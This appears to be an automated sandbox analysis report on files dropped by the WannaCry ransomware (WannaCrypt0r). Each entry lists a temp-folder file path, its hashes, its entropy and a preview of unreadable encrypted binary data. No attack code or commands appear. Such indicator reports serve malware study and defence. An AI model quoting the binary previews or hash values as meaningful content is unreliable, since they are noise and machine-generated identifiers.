                                                  Preview:y..m .. yO,n.Q)p....y8t.Uf?.h.........+.^w..Q..d.>.pq.t..\.0.....xh..u^.........>?C..!~9.r.B.]dJ.m.C...'y..z;...>...}\.@<.!RE]..{..`...;.<`..iu?..*....D.H.J..0..j?._..."Z..._.V.O..S....L."..G....<.6AQ...mb.!c.G..w....$..M..9..H\x/....5...H2.../...?.....(F.. ...G/.$.N......l.a2v.#)...P...A...c..&g!..d2.b..V..&dI.....O7X!..W....*1Y..a....Tn..]b]>..e....s.3.|.p=./0.>:...>BU.SZ,........A....39.F.3;g...n..,....6.2..nHZ.......'......p..i-V.d..LI...X..t.T.[.D..u......`<....TsA.-...c.....*...#.S..a.?.o|.*...+Gk....=.;.y...K+..S.R}N.T.0."..e7L2g>..:R.j..R..1.x.e.g........%~....bXK..j[........~...V2.e;.3...@.C.....gE{.s8JC;.g.......A.."@......:).hk.P.2W.l...L?.... .\.sf..[.....N.._...5....6.p@vwp.rQDyrk...P..:...w....:.D..!G.....P.L.(sr!....T..&0.........3....].W!_...B..(o....gs.x..l]q.NEV...p.E..K-p.=V M..Xq...g.V.qj...{..."?Y.]...".}.\t4..t.@$|..0..mf..P>u.....|.H...F.d."..+1...,k..mT..V=..w...7}...8.vY.*..2..Y.........*CL..8.-94.r.n...-nFL...a.....Z..`Ej1$.

                                                  C:\Users\user\AppData\Local\Temp\14.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.79388529309449
                                                  Encrypted:false
                                                  SSDEEP:24:MSbJga/CJC5gmVwdm2VQyvrWImF/Jcl6qoC4nciiWw9N/boZ/LK4d45Ri/853/:J9qJdYXImF/Sl6akcivE1Ou++0Av
                                                  MD5:B7251413F6464A956DB6CBD36894B486
                                                  SHA1:7FEBBA3BAE89421703EC50A023FB62DD53930402
                                                  SHA-256:D6C814680636728B8FBD9F15E83638436780F748E2B4B5CE8DB1ED0564D97628
                                                  SHA-512:AD5BD0D32F390EA55E0E3DD3DE20854ECAA031945775F9E3CE21F4C343B5A8B0A090C3CF56C95BB2D94C464E165B2EA2A3B20E7CA70A52FEB44FAFA2F4436399
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:z.\2c......D..\NC.....e....A..Ih]S.)L.'@.......:..x.ci.._E.$8o$.X.=..Sm.W..)S&..lT3.....y...L../....w!f.p!..l..n...kC+`.-.<.@.V....:.)..o.'...c.U.1..Y-..........Y.<..{a.J.\..[..R.I..-..7....?!z`.......-...h....'.{q..... .Yu..\..R...C.(..^....yy+V...>........g.{.'.C..-41..y....>e....I..;.'..q.....>..2E.......A.8.U.\.|...:.{~..u6T,.F...y.:^`.H.. ..F?.>.oW....3...%.OKZ.m.wS.{...G~.U......5......6.Q.v...*.*Q.2...R.1V~.nPT..~.l..`a..Q.|....o..HA..?..X...W.(`..txY........N..7..%..i..".VX .`\".}._..v.......x.a.5t.....}.#`...S...%.-.1<.`.<l..N.J...K.M..M.$.A.....X>.V.....~.L..........S.....Q..2...~..T.-c.?@...............y.B}..#..G...R...."....}.7ac..`l...Y.."1.._K.........(.O.$.m....HQk~c.)9Od....M.4......h......]:<....8...`7,4.>..[.Y..;h...I......]....0.~..r!.lIg..8X,.W>jk+.........). ._..@......W..4`....B.4...d2wg.J........<.....PjJ...H..............nTm?...l..^....Z../-.R...'t.@D.D.@....T.)6.|...B....l.r.y...f`....O,H.Cx.$.....Y....4.~.4...6Rg...+

                                                  C:\Users\user\AppData\Local\Temp\15.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820132533577611
                                                  Encrypted:false
                                                  SSDEEP:24:+8tgG04kj0G0B1ZjjeY5jX9zq7MiAlkBxwtVaH4PYOYdZ5g:Ls4kITjTPiMibwt64gOF
                                                  MD5:6196312BC11ECCCE2C9ABF8942EAF8DE
                                                  SHA1:FC1636AFDED96DEF170ED53DD55824968C0158E5
                                                  SHA-256:44DDE71FBE214973166A773382EC2DE4C9EE893DC2723CE78C73338F26FE268E
                                                  SHA-512:D2ED06C37C721A5AB8BE97EE36C6475ABEFD7EEC132D4FCA2C61A09AB31448A2835C724CFA77094FAF03BFD3C0C794F986E0BB5A012722A5A638596B68C99FC8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.:..|6H.%;..XS.../....~V.$..yR.r"..._..,....`PGU\._...O.O.S.$..C.... j8.^....u}.u.b*...]5.<..,....z..0...s.#-...].3...%g.....N)..6>...X.....A9..9x.k>@.....{.K}o.Mh...nR.#...U...Q..a.......W: ..}.9..f?>.v.:.. o..z....r?[.c.y. Z.2.7fsJ..D...y@.K.l#...1.....B....C...2.".o^;v.;p....o....<.>.2...5....Q...2...f.i..D.).md.&....W..p_.6...%.R.9.w..H..Wp.UlL....}...&.N2o ..KWx..a....s$.k.Ui.p.UB.z...x.....A=0~.......-.[.Sv..V....h.'.....S....In...3...+g....-.O0..w....J.T.....:.....F.u..E.liQ..(I.y...E,.'.X`....QE.g.X...6..?HE8...7.!.X....&..!.J2+.*..J.....3..DpxwS{...T.h..E.........L..........^c}..:..........s....=.2..f.3v. P..pcQ>...Y..'..9..d.K...m.S.^.,Cx.8..B........)Is>C..#.fN.DnK.....D.D.Cl.....P....r,%+...g7gK...Y...P1Ud}v....S...l/....8T..).Ro..S[........B;.....{l.......x.....u.A...2.......v.S^...Pq.i?.....R7;..$Q.)..g+.z".u.J`....l.Z...K..k.yW....#eG..B_.Z?....3..Fk..c....s..UnQ.W.7.+....:..._..k....;bQ..!.6F....J.E...O.H..

                                                  C:\Users\user\AppData\Local\Temp\16.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820494558970135
                                                  Encrypted:false
                                                  SSDEEP:24:ADm4t/ll9llP3Vf4vQHGsbpkAjRx7nVHXhfFC3UwxYv:SmkL9lR3VAvopJrbC3jxYv
                                                  MD5:B834AC3D1BDF3E7BEC7500426F156D72
                                                  SHA1:5164996DEB6A74DF6500CF13F3DD16A30A6DD30D
                                                  SHA-256:7577B2F5654E5011AD38A6E87594F1A4093DBCC4CCBCC36FC3A4E854A66BB066
                                                  SHA-512:1F906A1FCDBDBA11286BE25423C98E8D2065DB0F263DA6A95433FF405AA0021704558DAB34679A00B7AA1CD026F5B0F27F3030F1600BD3C824582C5164D5ABC1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:... Q.....v.C.({....I......`..'.n.0.kds...8*......6\...0a..,..:O.;.X....`...M.<>..r|...J.n....*.r.FV.Ei"5..>.....P.........1.V.(.|[....g.7^../.'./l.^../.?L.O..Z..s.,#.lk*......2)..i.Z0.Gl.......2.IT.:......Tye........q........'.2.y.e.Tr.mM......o.,2.C;..{......Ag#.J._Z.u:..5;......n....+..2. o.c.z.8..X.f]...Y...(.c..=..V.."..2..Q.w...$..*.5.Z.*8..f.....(.l3P...@"....t...e.uc..d."..A.g.(..QC...f.p_.t..j.I.U.....;.,..k...!>.t.qE}..#....+RI_......t.y.-..........GGs.{.9.SAD.~..N8".)r7*_.......{.t..i.Q..r....!...).%-..gk?.... .+..U.j.....;.../T"....&..&M.C.n..7..4..x.i.CbY.q.._....&...'...y.E...H.)...mL...)DA...`..........e.,...uT...s.....l7:.r..?&=...T.$. .a.i3....W..]m.}...6K.|..4..p..N\Ze..o.KD.^....x)A......g9-..._.(t......?Q..qH..Dn.@....|.8S..%.....?.HwI../.t..U..\..z.##..=.w......".....2.....v....R?..Pt.=Y....<5...............1...Co..Fn.P.}*...&...L...Dc...e..i..;.X..<....r. Z.kj..&..0.d.!..::....m>..q..............G...T......JYM.

                                                  C:\Users\user\AppData\Local\Temp\17.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80676028200717
                                                  Encrypted:false
                                                  SSDEEP:24:rSJpEQMygrTNx917rqyh7Qns2DJDpE9l7CFu1OQlIkTxVM+X4P:+JpE9yQXrWlUsclI8xCP
                                                  MD5:8FC59C942D4674990F2316F7AB80A2A1
                                                  SHA1:744A515110B2A5925BCD5C5D730ADCFD5BE45819
                                                  SHA-256:242224D879528B17B1D050AB74C49736815934FEE16801AC93C0E10AD92FCC74
                                                  SHA-512:2B61BAA88001FEAE752EE5E44FACC36C2B9CDE666F7C97F087BA6591D573BBD4D19D1038F2690B5556C68F20E626C121E75D6942F42560BD6FE61EB4EFE5583C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..|p....9X71...L.R:.)"..1=R0>.A.m..#j(^.Mx .C......ib...9.O..._v.N8..Y..&.8\..1^T].....F...Z...R-.\.$...E....w"...>r.. .......[xA.w.V$..hf......G...+.X..F.o.-)-.E../....hw...............S.....J....vp...+`kR..(H......|.a.0.-o....~..P..=.f.C0&...yX....o.....G.?.....*.&.IW...,"F.c..m..jL.p.:6....T...1..Wm......V0.."..j..C..k.)6.vXdA..tXySf...c.Y...G...3.J....S.i...}......0.=....|.....T....Q@..u...O.&.....TW(.]....3..P.b..z.'J.....N.Aw..v4.$$:$c.*..b;..W..3.;.....C..1.>.sr_.P..)....;.....|..U.@/....,....T`.G ...-.#VV./..a.e.;.]hu...ts..K.........t....PXe.j$../..n1Q...~.3...Tqp....i.b^L[..x..Q...Y..E..$=...}:.K.....@p0.6BY.,. H.B..0.[/...,..eo..... .Yl\..`b....u.6.....w...<L.....u.U...R.O......$.K....).$.....4..S.._].....\.=$..%k.xV\.....U.|#.VXgC....$.*..J.J.......0..'u..K...m.k......u....0=.n..)......k.U......-.ho)j...}v#..)E"....=.B."...ne.wo......i.....`q.d.J..[:#.&.W."(..0..].....&..H.9?...r..g..M...V.H_..6....<Fo.......k!..h9..N#..*

                                                  C:\Users\user\AppData\Local\Temp\18.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.808252857964589
                                                  Encrypted:false
                                                  SSDEEP:24:8c7nuG8KrmN1cwd/iycCSAA4LzWHjYMt4tgpJVbpPpQi3XzAElaDB8Gia:8wJ8KrberSAlY07ypJVbpRQi3X1cDB8M
                                                  MD5:21A1614C2FA810863177725C016EC1E1
                                                  SHA1:895166AF0C193AD661F6AC244C81E00AC347B534
                                                  SHA-256:DC1D239A74055845FDB687708BA1A791C7E79EAE3FABBAC678FD4239BE3C7811
                                                  SHA-512:83A06BC9F21775810E73D70FE7423A1D5350373534F5181CB6C2942767860EA41306542E6E792CFF610C2610714B1BC296792E3B72E78B4383CB116E7B1031C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:7C...&p.w.l..J=.Z.Qv(/B...)$......w.U._.S.............06\..Q....>....Z.......R.8.....j.Y.m/-...i.(L....9o..Z..3..,.M{m.....o.....h.....>...Y....s...m.........g.....u...m..6... u......N1H.Y,...io.rr..k.....tc.6...p.d.H..?hOl.S......Buo.|....M.qa.....{....ie.....IYP......C..A.......#Rg.......e...T....K.N..f>..0v.$....P..)GjIYLs.7$.CU`...A..V...9..o)Z]...6.....'M..=U..$...e.. ...../.@..n.n>.h!.|...>7pVATo..IN...Y.DIy;.5d..%xG.=k.pj...V[...o....(..Y..7..>.sD2....X..l.=i..*YS.c.j..x..TE..F.G..EW.,z...=%..&.Y'.9.....e.0H..u..BU..b.P...N..G..y.V.g.j..'.Ch:..+`5(....*.v.A....="r.....l.Q!.Q....H...8..N...;.0.G..>...a.I...Rk.G..,W.8+.|%..\......Cm.[e.n..+.W....y..9......h.....`.K....*.r...`.....W.t..>.I.#.[du..d(..u8..H...D.B0"....1.I....).#._...+...,.St.....'f..s......b`.An.....W..-......*..E_..fv....3.cSm-,....|.....`>-_.F.].F2..2(.7..d.kB.&....i...58U..G....`z.] <.>.[..,....uLm.....3m.*..'..2JS.....S.L`....Nx8E1.........D.A.'..dG.$OM

                                                  C:\Users\user\AppData\Local\Temp\19.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.826350738111068
                                                  Encrypted:false
                                                  SSDEEP:12:YruZFeeEax/HHEboxwL8cNA6rUfMENZP/ikLcYMdUPnubgc6Zip1yQ9+a25rtDm6:YruZ4KxPk2EN/GnJWcyp1yS+V3nCi
                                                  MD5:166C30A46A36C94357E0F1D9CDEB0C88
                                                  SHA1:4A5AEA9D5A129F7BAD1F9AE7E6B6FA39B066FB88
                                                  SHA-256:2082B8733FC817CC4FF6BBE04E7148D8B076AD6AFD32F2FE92C50D0E46346F61
                                                  SHA-512:584D2A89B1B4AC532640D2BA6D144516E64B567AA718C2A782501571FBAAF58E6E92C86074EA1AB8A14E995DE228FF8AECA1A70EA2449383F113D5E9C30AAB4A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:c*......K.WM.0.n...Q....B....2.p...E.0g-".+%X.<s.N..m..?9\.XR....j=l..jb.W...d,tK.....0...;../......gl..Fg^.~..t...T.B.......D..*...Y.".ZR.......;.}.M.S..>._sY.WP.A...3.........G.lJ.a..|.>...a?..I.J.9s..a......X.....~.7......).0[.~.d....%d&.d....L...{.=:.M.....'F...h.....fw=...YC.....(..`.!.F!..m...G..T....:w....~;.IQ.0j.Z}.B.g....OBu.4....1 .5...F..9.~"R......[.QS.M..._0....&.A.Q.rG.....d.XWi..A.H....(..x`.GU..n.g.!.......:a...!6..v9..u.G.?...x....q..x....J.e....X........g.8+4....}.J......U.XyQ0.D..'.Oc.+q..).=\`.......hS.y..\.Cte.;.,@..8y..0+//....R.N.....u.?._...L..?......@n...S?I.$J.X.dN.m*..5.4.12..c/.*.......' .S........X..b.(.Uu.T....12y..e....%...@..^{.(.7.B..........z}...b.......1...........5.)lN..q ..J...)...3.....w..\..X;j.F.A.:.6.;.F!.......[!..<..P..@.W.[.A.%..:..2^..\F.........$B.j.K..........ph.=..D0plY.wx.....J...vP......+o.o4e...=..'o.X...Zw.T.P.8.n....m...&Z..P.nx.;..N.Vxo.}#....K.....Z(..&..IV._.9j.....A.....p..`....

                                                  C:\Users\user\AppData\Local\Temp\2.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.816488491819429
                                                  Encrypted:false
                                                  SSDEEP:24:mP0nagnuWOqkJV1fAez64SMXHEi7Kks6O0Q6nFPmuPP6:mMnwWODJVBFlHEiNsUQ6n0ua
                                                  MD5:A7AA06E714AFAD3E085BA0F5D7353939
                                                  SHA1:CDE0A010FE7544C646882EA7C503EE3701D67955
                                                  SHA-256:C3C6DF164895B3F81C6B3F3ADDE7CD114DEDA9CE30C852B255D5E8518EF51204
                                                  SHA-512:85B7D818C47F104FB70E7B739A59E12044F6C8DAC22D536EA1012D51CE9CB3503ABEA228F3B58D7F1EE2FE9E930770C2D842A46435527C11ACE464C17668F18D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.b.@..\..2)...H........O.U...(.k;D).....Efi?:..U...cL.6..%.E.!.1z....8..LR$G.|.|vmb./..U-{...T.0D.~..om..;.C.k......!j...b........J.gm.......*J}.G.sd%...`...u.......Yd;...eK..P.O.6Y&.xD.o.v..y........W+].....H.hb..R.....[ ......{....~...u.PH&.p~.q.f.q.c..L..!,l..i..T..r..3..c .x.zy.+.!Z......H.p..a.9..D.....B...[..tv.h.."..To.4@...K+.).r;U35....8."~HdxL.,.c..........8..w..@X.S...z'P...i...8..d....@..(.K.4..5i.j.i[....w.<.k.M3V,x....*.f....1/E/.......e/Y ,3.v......B.g_.,.\L.5....^...Ra..?.O%..E+~.......u..."e*...03..Z5....:.(a..#.m[..&........@....c#..Lv-.....n.-../..w..k..}A_B.7 ..c.....q.....B.L...&..Z>...nYV.{.......&.c.<j2...].(..".f...#..<._.B...Ai.#J.ElI1@.T<.3c8.[.E.eX.K...1H.....&....0.e.. &.r).W-.@...TX...A.u...[.Yt..a.$Yp........eYr.AI....k...fM?.....A..IS..[.....y..Uv...[Fl.A.....V..ad6?^..2"..$..sR.TW'[ .}9{L/....E...q..D......%X.>!.......d../{.os7f...n.{,.y..Ct.t.Y.y.5i.R{.E9.q..5N...........Z5.ElG|..29._y.ud.x.h]...h1y..>......'.F..

                                                  C:\Users\user\AppData\Local\Temp\20.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7961263472074664
                                                  Encrypted:false
                                                  SSDEEP:24:Ce51nCWS9SPYsPc9omlxW9EyG2reA7Ot7+rgPYJ/XNKCq:Ce5FE9SPa9omlxiGoeeE7Wmk/XNKCq
                                                  MD5:8C7FB12B707DFCC496C3507094BE39E4
                                                  SHA1:0AF7FC86A197A245288AF9897C0BA013435F2DCD
                                                  SHA-256:96084946E8B279BE7B63E9EF60259675B778E16871874C43AECFDA10A7CC3CC4
                                                  SHA-512:C1449584DECF13A5A2FA369ADD8034EC96E4C2338DCFE6BE4708D774C913B1600F59DDF541CB3E9699DEFBD354136CF340702E284AF464177C83456BA3742CE3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....K(.....O.'1h.E..I.`..lkNy..'s4.f.\..;........D1.......{...u$Pcs.K.D..........r..:}....@....s..........-..E..;..oC....A"..U..dF_!!-?.lg._.r...H..QG....J.K.....L;..>9..C..W..=O....9.A...g,s..4..xPa...)..O..X.1q.%....h...Z.!.........`..bt...N.._/.1.4..A.O.z.@.|.@.Q...S,W...'......{. .' =....p.'.j.._.4..@.....|8.U.d..u.|.N....93.....G....H......c.2|..Z..^....IC.Lj..K&.[.'.....\......|.sf..up....XZ.Q.U.....`j..!..q*2....o..0\[.>.C......q..F.HO.......;..I..d.C.HME....~4..T.'....0.IW,..S....j..._.het....b.;.......!S...|)E.~{.9...~C.v..D..nm.....T.F...;...Ufz.f..........b..".......z..i.}T..[z.S.L..G$...CY.....5..A.'.p..Z6.d$.6.od..........e........,.#a.).8k.].Xq2}.....dGM(6.!k. ..;+.E..MJe>"....1.n.E..W.sb.du.1..j.p. ..D.G..W.h......f..Z...D..k....p.-.Lv.....7dd..`LF-.} .h...n.!lX..-...-0...i.4E...$t..<vs`..f.7AG.&......."Xo.7..6,..=..Y.P.q`..8...v... ...1.....................>.M'$.Zt......*..!..o..yg...1.r.d\..re...`...m....w..GQ.\t.

                                                  C:\Users\user\AppData\Local\Temp\21.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.815272944964872
                                                  Encrypted:false
                                                  SSDEEP:24:zrwMCRVF48QfvYOHYpHSqBNTvTHElsgoqC0bkgTBnbK7qMQcDpdC:ztCuSLpHSW1THElsgDC4hTI7Hpc
                                                  MD5:248180BC7BCFB10B9C6F4DC1DC519C34
                                                  SHA1:73802AD9180A4428A1012149396A00734296BACF
                                                  SHA-256:2F2F04B235F7F07F480B6669708D4614FA4AB6D47BF1E5D400B5B750227FCDA7
                                                  SHA-512:5AC672AE6C4249F1FF526D01B1832AB2D61B9B7C43AC1C1D8C32D6B0256C1CD5F0CAC80250B0D53E2E0D6E2B13D6DF91A0BB9B930D3A481A97114E473A7BD15D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:a...T...g|{..X..|Q.*.*.p..7..|.P..%)..f.7.+bsO..rH\....5.....aK.O...1....=.&.l......S%eq........_.|E.D.b....@7..u..\........HR.K.x.P.+.a..9...W.^AS.:.te.....(26....B.A.2\..~HW..@.Kc..C./..S$L..EH...X..6O.......b]XL..O...M#..F<..1..."Wb...b..3.J..3..(.0..O...UV).R..j|.o.!..]j...L1.B...........Xh..I..&].f.4..t.F4.....v|..}..{......../....|...2.|...2y:.$.A.m.....V.d<f;>...9....;.f...3h?ae..i ..Y.`p{.OBn..G...\.v\.....M....5....m.9d.Bl........*....NO..f......7).......t*.*.....2#_FG.w.1i..*./.B..r.c.h...H...Hky.._....SDi...>.T}(.q...?._.*...I&.....#..2..s..g..=.7.{P.R.9p......e..K...2.S....^i.X.(R.... U+.(`.4.RT.Iw..bh.R6...5-.......S>-...0\d>...{....,G.zA.=...G._^io$,.7H:..b8) .+.J_.s..S...k.!.d.Q...5.....u...Q...y.<h..FZ.-8.\....}..e.......nE..0.|...".......>..x.ox&+...+.jh..(....eHQ.....[.4....7.....^(........>......V8..~....Z.~.kt.......[ux..=..(.%B..H.r..f...n...1f..?Qh..l.h..tj.&"};..0..p.....e.C.....z.Q.*.....e;WTa[...;..|...-T(.S....!......

                                                  C:\Users\user\AppData\Local\Temp\22.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7895203033273255
                                                  Encrypted:false
                                                  SSDEEP:24:wqNfV0ao+XsxRXMXwZH672c0y36ux24teSX5:b1X8KXwH6770y36A5
                                                  MD5:3A11AAF3B4B679AF1E85DA0196957B16
                                                  SHA1:CDD5A152F8DE1E9A90D3B79EF7872391677C97FC
                                                  SHA-256:9F6C5E43BC070798A6EB059578BD45A72B77EEF9B7648F80F70AF1580090C515
                                                  SHA-512:57717C0325140F0C21C0EA2A937329EB6F9CC171C785B8C61277AC5F7AAC6C3579051CB9569192B33A10F625230808B7826E7AA62D3CA8B124A8F47EE019A65A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:[*..n;.. H..*..h5.T..t.3W[..@..].r.P;A..duF..+M.8...W.q -F.Dy-E.K.*........I........(34.l.v.Rt...v.!.....Rf.......#......?I.s...|.7...3....r.|J..=..V5._...Nk.BPb..~.)M.R..yaU.#..B...^$q.{.@1...5R.*tg.......s66...0.n0Fbc...]..?..t.:.......qb{....evB. z..:.o..d{[g...?.^..Bufy..llj.E.c.:/..tU...^.F.)...Z.#S]Z..mj...x#x.......4...n.*Zp].3.l6....f......Jt9...a...`..^.{AH....|$.Ao....H.`..GF.....$.|..Z.<U<._.:..dEQ9..S.1_2......7..O..X...A...(vO.#.....kR.X<....y%....8Of...+....5...7M4.........=N..|N`.|]]7G...D^...VYR...Y.Z....?3.....*.K|\w\....o..M..-.....q.?.*....!.j...!..'...l..r.DM.>.....Qt.2...(t.yG@..V|.\<........x..t.j..j..*...:F...k6........{.1.-..j....K#....JU.......Z..}.N..Eh^.\8Zm).......K.1F ........F*<l.v...rSQ.%3......o.Z8Fd9R............s(....y?.s4..T...z....0....G..F../..."Z+....7K..f.G..B<u..`U...K=..........2!.i....~2rR.+x.M..KV..:......n/.V*....1....p.nIO.....]`4.03.$.4[a(...f:IAC.&..Bg..-#.......\W..n.3h?....Q.WF..q@{........R}....

                                                  C:\Users\user\AppData\Local\Temp\23.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.8028171231414705
                                                  Encrypted:false
                                                  SSDEEP:24:1YGWf8Mo45cZVXIcYi5U0NoDXLqDgVuKYCXearo2tnS2tCGX1Wu:1Y70MsZtYi10q2uKrBrDpZXP
                                                  MD5:E2D5E69252CF336CD099FBAFECEF877C
                                                  SHA1:E83E79CFF15FD565E173E14E637A7BCD8B998510
                                                  SHA-256:C30EDDF1F70BB44D1AA47134A855A54A26EC7949D83167CB45F3335ED3387D06
                                                  SHA-512:3F03493DEAA889348132F6B9B5103818A45AD253B3E97764CABCF43FCF99052CEE72F19D6D09D4A992A31A4480D0B1861DCC8908E74ED8C8F96574383B2DC661
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:8z.~..!...p~..x."e.GO.|<...bZ..X.2p.f..J...y.k.JD.!...e......H^.'`........h^.E.a..dY..?.7.R........!{..<...@.e..2..d..wG0.W7....c..\C......)..k=..}...8=c.Z_.1....2.....!.~.)Z;....b.#..f.....kew.vRSDWy(.WX..:v.N.m..C....f1SZ.0..#PK3...U....<...G#.......~...M.......(.I...^..+.U...C...B9.M.....j..i..o...'..3...N..n.7.>b..@sx\..~..G..Y....."&'...Q..1....]4...Ls.......h.u[...,.y`...o....WEs...x.@...6.U...B.^s.8.p.r+......Z.;4......,..B.E......D<Gt.......-9!yONW.h-.r"..g.>....x2`..kF..`/\9..h...?...W(!^...[.{..+Oq..W..W}V-|.u../...6..9wh.J]0...K...-.9......,.ov.)6+..g........p.n.P?...y.6.9y..i.%9.0_....".5...*...U..:E..aQ...9......2....8...).$0.k!Tg....!\.e@...E.L.......p.....B..V.:.........Q....R;Nl'....4..o.#.f%..9.7.H..C..(.J.... w..|b.....P..]H.}..../.O.....X._J...F.7.x...\^|.&.A1@..;U..........u......2....B.Y..CvS..-..k.>..............5b......[1..Y.^......../..iK.I-n.c.`q.|....(o....\1<..qD..a.W..3'.}8'E..l.....j.'.BR.....

                                                  C:\Users\user\AppData\Local\Temp\24.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7891074325900505
                                                  Encrypted:false
                                                  SSDEEP:12:K0Np0hOjDECUi350o7fQKkaN7af73QGwSpi8e8tUAG3dwCmDlPvDNLnfuhWia/sn:K04i5RRN7aDQmmAGlmh1mek/wDBJpsOi
                                                  MD5:610CEA6428D56E4BD7B4A1F0AE85D610
                                                  SHA1:34E99353C6A1AC6C14CF62B7374EA86F051B58F8
                                                  SHA-256:9547E72138763DB1AEA4F014FEA8AA71D95811E156A0A4982F7E157CF402EAE3
                                                  SHA-512:F30B1E6B1DAA4C74DD9D15E802927C277DEDEDA91FBBD4C263DA3FF18E81AE0CEBDD70C31C91F994BB7B832CDFF3DE773D5A0F5DB85A5286AA21C29BA521D7C3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:...1..0.m+.2.m.Q...Yo..Da.V....O^....a.d..#,..o.'Pj.K>..7..s='.......Y.sq ^..2{....Qfz.Q..i+...._.*...|_..... .R.. ;...G.j....9 ...x.Q)..^_..>w.3M...9P.c.f.7...&....V...[n..(....d.X..,"Y..).V\..9.VO..44..x..qx8pW.z...z+.Uq.........f4.aD0.TCN5..Q..IS{g>.u.rjE$..c9.w.G...H.^Lo9..I.._e..N'g..1....$.....2\.Kk.xg...c.h2..Oi....A...p..9tb..l..F.u..F.X.p.......3...}q..B5.w.|._^i..T`7..|]wxJ..(.E.l..U.9.o....j...z.1a.$.(i..F..].|9r..E._>.. ._...f1.M.4..to..P..q...).Ll.UUB...H..1...50.U..n.E]^....D^.4.3... .S.>.@...... ......YMK..k0n........q.|.sz)=.X.E..../..)h...cu...W.<..va..`m..W......& .B..:k...M.{6.w...+..R.w..Z...5.V..|_.....>.o...........t{....S..uC.y..v.0...+>*h..ri]h.A's4/....yn,HbEmRTg..c3.p....g.."../.v......A..nB....|.T.~...ab......M@}..I...PNgS.."J?.A.sH..W.AF.0s.F.t.=. I...>..q6.8.db8.w..qN....M.....)..~...jW..[.z...w.._p4...B.C.`.T^.?...........\......x|07...M...>.O...OF../..B......[....F.S.V.W.(.... ..'D.-`.B".t.....g;.X.t...

                                                  C:\Users\user\AppData\Local\Temp\25.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.81632071911657
                                                  Encrypted:false
                                                  SSDEEP:24:ITFvD5hx/5oFFSIxKhaW+pft33QZmg2whnpssX1MFDR+feTr:0FvfxBASTbQF3ut5XuFkWTr
                                                  MD5:F8A5123CA0ED821F6F64D501F813988F
                                                  SHA1:F4EF3DD652E349F053B3086B49620256CCBF1C3F
                                                  SHA-256:0235EBC962844215FF04915223E57D53196C4E958493B8C4A1F3B6C5D6B78035
                                                  SHA-512:B9B321B2E1488EF72911F9DE2BDE81E73397E53344BB20CF0883F5F22D7DF797CE15B7F4D94733C1F25FC03AABD4A54B552AF95783B126E3AF777D450163E9FF
                                                  Malicious:false
                                                  Reputation:unknown
